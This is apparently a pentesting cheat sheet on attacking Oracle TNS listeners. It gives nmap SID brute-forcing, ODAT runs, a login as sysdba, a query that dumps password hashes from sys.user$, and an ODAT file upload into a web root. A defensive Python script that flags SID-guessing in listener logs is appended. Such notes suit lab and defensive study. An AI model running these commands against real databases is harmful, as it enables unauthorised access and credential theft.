Oracle TNS

Oracle Transparent Network Substrate (TNS) is a communication protocol that facilitates communication between Oracle databases and applications over networks. The default Oracle TNS port is TCP/1521, but it can easily be changed. The configuration files for Oracle TNS are called tnsnames.ora and listener.ora and are typically located in the ORACLE_HOME/network/admin directory. Each database or service has a unique entry in the tnsnames.ora file, containing the information clients need to connect to the service.

In Oracle RDBMS, a System Identifier (SID) is a unique name that identifies a particular database instance. A database can have multiple instances, each with its own SID. An instance is a set of processes and memory structures that interact to manage the database's data. When a client connects to an Oracle database, it specifies the database's SID in its connection string, and that SID determines which database instance the client connects to.

PLSQL Exclusion List

Oracle databases can be protected with a PL/SQL Exclusion List (PlsqlExclusionList). It is a user-created text file that must be placed in the $ORACLE_HOME/sqldeveloper directory, and it contains the names of PL/SQL packages or types that should be excluded from execution.

ODAT

Oracle Database Attacking Tool (ODAT) is an open-source penetration testing tool written in Python and designed to enumerate and exploit vulnerabilities in Oracle databases. It can be used to identify and exploit various security flaws in Oracle databases, including SQL injection, remote code execution, and privilege escalation.

Tips2Hack

  1. Nmap

sudo nmap -p1521 -sV 13.13.13.13 --open
  1. Nmap - SID Bruteforcing

sudo nmap -p1521 -sV 13.13.13.13 --open --script oracle-sid-brute
  1. ODAT

./odat.py all -s 13.13.13.13
  1. SQLplus - Log In

sqlplus george/burger@13.13.13.13/XE
  1. Oracle RDBMS - Interaction

SQL> select table_name from all_tables;
SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
GEORGE                          CONNECT                        NO  YES NO
GEORGE                          RESOURCE                       NO  YES NO
  1. Oracle RDBMS - Database Enumeration

sqlplus george/burger@13.13.13.13/XE as sysdba
SQL> select * from user_role_privs;
-------------------------------------------------------------------------
USERNAME                       GRANTED_ROLE                   ADM DEF OS
------------------------------ ------------------------------ --- --- ---
SYS                            ADM_PARALLEL_EXECUTE_TASK      YES YES NO
SYS                            APEX_ADMINISTRATOR_ROLE        YES YES NO
SYS                            AQ_ADMINISTRATOR_ROLE          YES YES NO
SYS                            AQ_USER_ROLE                   YES YES NO
SYS                            AUTHENTICATEDUSER              YES YES NO
SYS                            CONNECT                        YES YES NO
SYS                            CTXAPP                         YES YES NO
SYS                            DATAPUMP_EXP_FULL_DATABASE     YES YES NO
SYS                            DATAPUMP_IMP_FULL_DATABASE     YES YES NO
SYS                            DBA                            YES YES NO
SYS                            DBFS_ROLE                      YES YES
-------------------------------------------------------------------------
  1. Oracle RDBMS - Extract Password Hashes

SQL> select name, password from sys.user$;
  1. Oracle RDBMS - File Upload

./odat.py utlfile -s 13.13.13.13 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
curl -X GET http://13.13.13.13/testing.txt

Hello There Adventurer!
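
A defender-side view of the SID brute-forcing step above, as an added example that is not part of the original page: it scans listener log text for clients refused with TNS-12505 (unknown SID) on several different SIDs and records any SID they then reached. The log lines are constructed and assume the asterisk-separated text layout of listener.log; `find_sid_guessing` and its `min_distinct` threshold are hypothetical names.

```python
import re
from collections import defaultdict

# Constructed sample lines (not real data), assumed layout:
# timestamp * connect data * client address * event * name * return code
SAMPLE_LOG = """\
12-JUN-2023 10:15:01 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=svc))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.20)(PORT=50112)) * establish * XE * 0
12-JUN-2023 10:16:10 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.66)(PORT=40001)) * establish * ORCL * 12505
12-JUN-2023 10:16:10 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.66)(PORT=40002)) * establish * PROD * 12505
12-JUN-2023 10:16:11 * (CONNECT_DATA=(SID=XEE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=svc))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.20)(PORT=50120)) * establish * XEE * 12505
12-JUN-2023 10:16:11 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.66)(PORT=40003)) * establish * TEST * 12505
12-JUN-2023 10:16:12 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.66)(PORT=40004)) * establish * XE * 0
"""

# Requested SID, client IP from the ADDRESS block, and the trailing return code.
LINE_RE = re.compile(
    r"\(SID=(?P<sid>[^)]*)\).*?"
    r"\(ADDRESS=\(PROTOCOL=tcp\)\(HOST=(?P<host>[^)]+)\)\(PORT=\d+\)\)"
    r" \* establish \* \S+ \* (?P<code>\d+)\s*$"
)

UNKNOWN_SID = 12505  # TNS-12505: listener does not know the SID in the connect descriptor


def find_sid_guessing(log_text, min_distinct=3):
    """Return {client_ip: {"rejected": [...], "accepted": [...]}} for clients
    refused with TNS-12505 on at least `min_distinct` different SIDs."""
    rejected, accepted = defaultdict(set), defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # not a connection-establish record
        code = int(m["code"])
        if code == UNKNOWN_SID:
            rejected[m["host"]].add(m["sid"].upper())
        elif code == 0:
            accepted[m["host"]].add(m["sid"].upper())
    # A single mistyped SID stays below the threshold; many distinct misses do not.
    return {ip: {"rejected": sorted(sids), "accepted": sorted(accepted[ip])}
            for ip, sids in rejected.items() if len(sids) >= min_distinct}


if __name__ == "__main__":
    print(find_sid_guessing(SAMPLE_LOG))
```

A non-empty `accepted` list for a flagged client means one of its guesses matched a real SID, which is the point at which credential guessing against that instance becomes possible.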
